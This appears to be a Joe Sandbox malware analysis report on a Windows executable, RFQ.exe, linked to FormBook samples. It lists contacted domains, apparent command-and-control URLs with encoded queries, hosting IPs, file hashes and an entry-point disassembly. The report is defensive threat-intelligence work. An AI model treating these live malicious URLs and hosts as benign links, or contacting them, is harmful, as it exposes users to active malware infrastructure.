http://www.corpseflowerwatch.org/yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx | 100% | Avira URL Cloud | malware |
http://www.migraine-massages.pro/ym43/ | 0% | Avira URL Cloud | safe |
http://www.vnxoso88.art/d26j/ | 0% | Avira URL Cloud | safe |
https://whois.gandi.net/en/results?search=astorg-group.info | 0% | Avira URL Cloud | safe |
http://www.fiqsth.vip/0m8a/?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR | 0% | Avira URL Cloud | safe |
http://www.evoo.website/293d/?7j=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQY4I1bDlFW6+Qsk+eyldD4LupDRErgy15HSDrpN9gAoL/hEh+9gUTgMo&UvgPX=o0HdzhbpI6gx | 0% | Avira URL Cloud | safe |
http://www.astorg-group.info/vdvc/ | 0% | Avira URL Cloud | safe |
http://www.vnxoso88.art/d26j/?7j=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN2l5ObUVyEmhL88sORBUDBhEqT85THbs6ZR8PHSXuaXUURr4h8daA5RZo&UvgPX=o0HdzhbpI6gx | 0% | Avira URL Cloud | safe |
http://www.pluribiz.life/afcr/ | 0% | Avira URL Cloud | safe |
http://www.bio-thymus.com/ezyn/ | 0% | Avira URL Cloud | safe |
http://www.migraine-massages.pro/ym43/?UvgPX=o0HdzhbpI6gx&7j=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQrtCTIFT6dG/tSbtJaoqKbhoy9A6auA9JhwvUMdjGZYE6oZ+fUFh6Re5 | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | false | | high
www.evoo.website | 128.65.195.180 | true | false | | unknown
fiqsth.vip | 3.33.130.190 | true | false | | unknown
www.wukong.college | 47.52.221.8 | true | false | | unknown
bio-thymus.com | 3.33.130.190 | true | false | | unknown
vnxoso88.art | 66.29.146.14 | true | false | | unknown
www.pluribiz.life | 209.74.64.58 | true | false | | unknown
www.kdtzhb.top | 47.242.89.146 | true | false | | unknown
corpseflowerwatch.org | 3.33.130.190 | true | false | | unknown
www.migraine-massages.pro | 199.59.243.227 | true | false | | unknown
www.corpseflowerwatch.org | unknown | unknown | false | | unknown
www.vnxoso88.art | unknown | unknown | false | | unknown
www.4nk.education | unknown | unknown | false | | unknown
www.astorg-group.info | unknown | unknown | false | | unknown
www.bio-thymus.com | unknown | unknown | false | | unknown
www.fiqsth.vip | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.4nk.education/gnvu/ | false | Avira URL Cloud: malware | unknown
http://www.evoo.website/293d/ | false | Avira URL Cloud: safe | unknown
http://www.astorg-group.info/vdvc/?7j=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfNZBZZEaN8IgdCZSECanEbYOAZ+JnzF5T5/sjPpe9MQhZicEiQ4HPQfz&UvgPX=o0HdzhbpI6gx | false | Avira URL Cloud: safe | unknown
http://www.fiqsth.vip/0m8a/ | false | Avira URL Cloud: safe | unknown
http://www.bio-thymus.com/ezyn/?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx | false | Avira URL Cloud: safe | unknown
http://www.4nk.education/gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gx | false | Avira URL Cloud: malware | unknown
http://www.kdtzhb.top/1iqa/?7j=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgVC25Yrin2Sqkv5Fwdk+dvafD+ucZYRStKeuK1fTd52HaDhfGqTyDFD4&UvgPX=o0HdzhbpI6gx | false | Avira URL Cloud: safe | unknown
http://www.wukong.college/9ezc/ | false | Avira URL Cloud: safe | unknown
http://www.kdtzhb.top/1iqa/ | false | Avira URL Cloud: safe | unknown
http://www.corpseflowerwatch.org/yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx | false | Avira URL Cloud: malware | unknown
http://www.migraine-massages.pro/ym43/ | false | Avira URL Cloud: safe | unknown
http://www.vnxoso88.art/d26j/ | false | Avira URL Cloud: safe | unknown
http://www.evoo.website/293d/?7j=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQY4I1bDlFW6+Qsk+eyldD4LupDRErgy15HSDrpN9gAoL/hEh+9gUTgMo&UvgPX=o0HdzhbpI6gx | false | Avira URL Cloud: safe | unknown
http://www.fiqsth.vip/0m8a/?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR | false | Avira URL Cloud: safe | unknown
http://www.astorg-group.info/vdvc/ | false | Avira URL Cloud: safe | unknown
http://www.vnxoso88.art/d26j/?7j=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN2l5ObUVyEmhL88sORBUDBhEqT85THbs6ZR8PHSXuaXUURr4h8daA5RZo&UvgPX=o0HdzhbpI6gx | false | Avira URL Cloud: safe | unknown
http://www.pluribiz.life/afcr/ | false | Avira URL Cloud: safe | unknown
http://www.bio-thymus.com/ezyn/ | false | Avira URL Cloud: safe | unknown
http://www.migraine-massages.pro/ym43/?UvgPX=o0HdzhbpI6gx&7j=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQrtCTIFT6dG/tSbtJaoqKbhoy9A6auA9JhwvUMdjGZYE6oZ+fUFh6Re5 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://whois.gandi.net/en/results?search=4nk.education | net.exe, 0000000B.00000002.3130867153.0000000004456000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002D56000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.wukong.college | rNgGAKxrFRkFYx.exe, 0000000C.00000002.3131106553.0000000004C73000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gandi.net/en/domain | net.exe, 0000000B.00000002.3130867153.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3132876926.0000000006660000.00000004.00000800.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3130867153.0000000004456000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002D56000.00000004.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.00000000036C2000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://whois.gandi.net/en/results?search=astorg-group.info | net.exe, 0000000B.00000002.3130867153.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3132876926.0000000006660000.00000004.00000800.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.00000000036C2000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | net.exe, 0000000B.00000002.3130867153.00000000045E8000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002EE8000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer | net.exe, 0000000B.00000002.3130867153.000000000477A000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.000000000307A000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
47.52.221.8 | www.wukong.college | United States | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
128.65.195.180 | www.evoo.website | Switzerland | | 29222 | INFOMANIAK-ASCH | false
199.59.243.227 | www.migraine-massages.pro | United States | | 395082 | BODIS-NJUS | false
217.70.184.50 | webredir.vip.gandi.net | France | | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false
209.74.64.58 | www.pluribiz.life | United States | | 31744 | MULTIBAND-NEWHOPEUS | false
66.29.146.14 | vnxoso88.art | United States | | 19538 | ADVANTAGECOMUS | false
3.33.130.190 | fiqsth.vip | United States | | 8987 | AMAZONEXPANSIONGB | false
47.242.89.146 | www.kdtzhb.top | United States | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1551421
                                                                        Start date and time:2024-11-07 17:56:08 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 16s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Run name:Run with higher sleep bypass
                                                                        Number of analysed new started processes analysed:17
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:RFQ.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@11/8
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 47
                                                                        • Number of non-executed functions: 306
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • VT rate limit hit for: RFQ.exe
Time | Type | Description
13:55:43 | API Interceptor | 6021309x Sleep call for process: net.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
47.52.221.8 | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | www.wukong.college/9ezc/
128.65.195.180 | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | www.evoo.website/293d/
128.65.195.180 | TT Application copy.exe | Get hash | malicious | FormBook | Browse | www.airbnbneuchatel.com/0zfk/
128.65.195.180 | Inquiry Second Reminder.exe | Get hash | malicious | FormBook | Browse | www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
128.65.195.180 | LPOH2401-3172(Mr.Kem Sophea)-pdf.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
128.65.195.180 | PGiUp8uqGt.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
128.65.195.180 | LGSTXJeTc4.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH
128.65.195.180 | MVEjijPB3m.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?7n=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&q6AhA=ORGpz4MpyH
128.65.195.180 | luK5jtgopg.exe | Get hash | malicious | FormBook | Browse | www.zimmerli.online/btrd/?_vgLOdj=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&W0Ddg8=u2Jd-dT8bPB0k
128.65.195.180 | iKF9HO6p8LJfhir.exe | Get hash | malicious | FormBook, Play | Browse | www.derbychess.com/qfhc/?cNu_sBI=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkVKyniTIgT66iQ==&mg3Oy_=oFKCX
128.65.195.180 | IN0982746R789.exe | Get hash | malicious | FormBook, Play | Browse | www.derbychess.com/qfhc/?JmZH=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkX7o5TTIhSCIiQ==&e_6PiF=8ZYjPlE
199.59.243.227 | Z4KBs1USsJ.exe | Get hash | malicious | Unknown | Browse | glassbright.net/index.php
199.59.243.227 | YiqjcLlhew.exe | Get hash | malicious | Unknown | Browse | glassbright.net/index.php
199.59.243.227 | Z4KBs1USsJ.exe | Get hash | malicious | Unknown | Browse | variousstream.net/index.php
199.59.243.227 | 8CO4P3HwDt.exe | Get hash | malicious | Unknown | Browse | glassbright.net/index.php
199.59.243.227 | YiqjcLlhew.exe | Get hash | malicious | Unknown | Browse | variousstream.net/index.php
199.59.243.227 | 66HKNPT1fl.exe | Get hash | malicious | Unknown | Browse | glassbright.net/index.php
199.59.243.227 | 8CO4P3HwDt.exe | Get hash | malicious | Unknown | Browse | variousstream.net/index.php
199.59.243.227 | nnzZhhVIqM.exe | Get hash | malicious | Unknown | Browse | variousstream.net/index.php
199.59.243.227 | 66HKNPT1fl.exe | Get hash | malicious | Unknown | Browse | variousstream.net/index.php
199.59.243.227 | PORgjGswYg.exe | Get hash | malicious | Unknown | Browse | glassbright.net/index.php
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.pluribiz.life | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 209.74.64.58
www.pluribiz.life | MV Sunshine.exe | Get hash | malicious | FormBook | Browse | 209.74.64.58
www.pluribiz.life | #10302024.exe | Get hash | malicious | FormBook | Browse | 209.74.64.58
webredir.vip.gandi.net | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | SWIFT.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | #10302024.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | rPO-000172483.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | PO-000041522.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | Doc 784-01965670.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | rDebitadvice22_10_2024.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | PO#071024.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | PO#001498.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
webredir.vip.gandi.net | CENA.exe | Get hash | malicious | FormBook | Browse | 217.70.184.50
www.evoo.website | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 128.65.195.180
www.wukong.college | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 47.52.221.8
www.kdtzhb.top | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 47.242.89.146
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
INFOMANIAK-ASCH | XhAQ0Rk63O.exe | Get hash | malicious | FormBook | Browse | 128.65.195.180
INFOMANIAK-ASCH | https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL | Get hash | malicious | Ratty | Browse | 128.65.195.91
INFOMANIAK-ASCH | https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL | Get hash | malicious | Ratty | Browse | 128.65.195.91
INFOMANIAK-ASCH | z95ordemdecomprapdfx4672xx.exe | Get hash | malicious | FormBook | Browse | 84.16.66.164
INFOMANIAK-ASCH | Doc.exe | Get hash | malicious | Sliver | Browse | 128.65.199.135
INFOMANIAK-ASCH | Nowe zam#U00f3wienie zakupu pdf.exe | Get hash | malicious | FormBook | Browse | 84.16.66.164
INFOMANIAK-ASCH | TT Application copy.exe | Get hash | malicious | FormBook | Browse | 128.65.195.180
INFOMANIAK-ASCH | eqqjbbjMlt.elf | Get hash | malicious | Unknown | Browse | 84.16.66.164
INFOMANIAK-ASCH | hNX3ktCRra.elf | Get hash | malicious | Unknown | Browse |
                                                                        • 84.16.66.164
                                                                        xP1455Elxv.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 185.176.232.182
                                                                        GANDI-ASDomainnameregistrar-httpwwwgandinetFRXhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        #10302024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        BL.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        BODIS-NJUSZ4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        8CO4P3HwDt.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        66HKNPT1fl.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        8CO4P3HwDt.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        nnzZhhVIqM.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        66HKNPT1fl.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        PORgjGswYg.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCbyte.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 8.214.203.151
                                                                        8WdO7I87E1.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 47.244.127.62
                                                                        XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 47.242.89.146
                                                                        https://media.nomadsport.net/Culture/SetCulture?culture=en&returnUrl=https://t.ly/qrCwtGet hashmaliciousUnknownBrowse
                                                                        • 47.253.61.56
                                                                        http://bankllist.usGet hashmaliciousUnknownBrowse
                                                                        • 47.253.61.56
                                                                        IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                        • 8.210.3.99
                                                                        H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                        • 8.217.17.192
                                                                        En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                        • 8.210.49.139
                                                                        mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                                        • 47.242.252.174
                                                                        arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                                        • 47.251.12.143
                                                                        No context
                                                                        No context
                                                                        Process:C:\Windows\SysWOW64\net.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                        Category:modified
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.1215420383712111
                                                                        Encrypted:false
                                                                        SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                        MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                        SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                        SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                        SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Process:C:\Users\user\Desktop\RFQ.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):288768
                                                                        Entropy (8bit):7.99476597855917
                                                                        Encrypted:true
                                                                        SSDEEP:6144:tkUFCALQrORWQ7XPusIbL26Rrq8xxR161ep/wXgluSCKfFz42:tZCI6ORWq7+K6U8x161FSoWX
                                                                        MD5:07787B7FDF65B59807C98A7F6C108CCA
                                                                        SHA1:26B5D8C31482315466C7F2D1A55C8CB8CB8A0F3E
                                                                        SHA-256:08CC9C8E6A6F1D32101FFEEBE5623311FCD437C3E741B3200779E665CA95E116
                                                                        SHA-512:D8F6CA336EFDCA38BEAC1D4A317D580BE6E29703A7CF074E9BD226020438D4BE84A0F7DF56EEB22426B97D58A9E5EF6F3EA3C3356586FA202CACE73DCBA12C90
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.528072517069111
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:RFQ.exe
                                                                        File size:1'338'211 bytes
                                                                        MD5:85496e3bd4f547ed3ecb4bba94401773
                                                                        SHA1:a59428a86cc0e1b04e05444a66a862dc872f24d1
                                                                        SHA256:ca6e99cb086dcbdeaa2e6dcefd08a5907eb2f6b0cee11da6aef68818bbdaa72b
                                                                        SHA512:c020b61ffd0948f6195ec5f431f2913001d328d5df719b915b1249f466f8d9557ff54fb74ff4d4532441a2b17c963cef9794a6ce6d2c9cf8f111fbb0ea8f058a
                                                                        SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCJvCojfsNEuw4RPayIbHSsA/9RXiJuS:7JZoQrbTFZY1iaCJVfCEv4RPNIrq/7Xi
                                                                        TLSH:2955E122F5C68036C2B327B19E7EF766963979360336D19B37C82E215EA05416B39733
                                                                        Icon Hash:1733312925935517
                                                                        Entrypoint:0x4165c1
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:5
                                                                        OS Version Minor:0
                                                                        File Version Major:5
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:5
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                        Instruction
                                                                        call 00007F7E7880811Bh
                                                                        jmp 00007F7E787FEF8Eh
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        push edi
                                                                        push esi
                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                        mov ecx, dword ptr [ebp+10h]
                                                                        mov edi, dword ptr [ebp+08h]
                                                                        mov eax, ecx
                                                                        mov edx, ecx
                                                                        add eax, esi
                                                                        cmp edi, esi
                                                                        jbe 00007F7E787FF10Ah
                                                                        cmp edi, eax
                                                                        jc 00007F7E787FF2A6h
                                                                        cmp ecx, 00000080h
                                                                        jc 00007F7E787FF11Eh
                                                                        cmp dword ptr [004A9724h], 00000000h
                                                                        je 00007F7E787FF115h
                                                                        push edi
                                                                        push esi
                                                                        and edi, 0Fh
                                                                        and esi, 0Fh
                                                                        cmp edi, esi
                                                                        pop esi
                                                                        pop edi
                                                                        jne 00007F7E787FF107h
                                                                        jmp 00007F7E787FF4E2h
                                                                        test edi, 00000003h
                                                                        jne 00007F7E787FF116h
                                                                        shr ecx, 02h
                                                                        and edx, 03h
                                                                        cmp ecx, 08h
                                                                        jc 00007F7E787FF12Bh
                                                                        rep movsd
                                                                        jmp dword ptr [00416740h+edx*4]
                                                                        mov eax, edi
                                                                        mov edx, 00000003h
                                                                        sub ecx, 04h
                                                                        jc 00007F7E787FF10Eh
                                                                        and eax, 03h
                                                                        add ecx, eax
                                                                        jmp dword ptr [00416654h+eax*4]
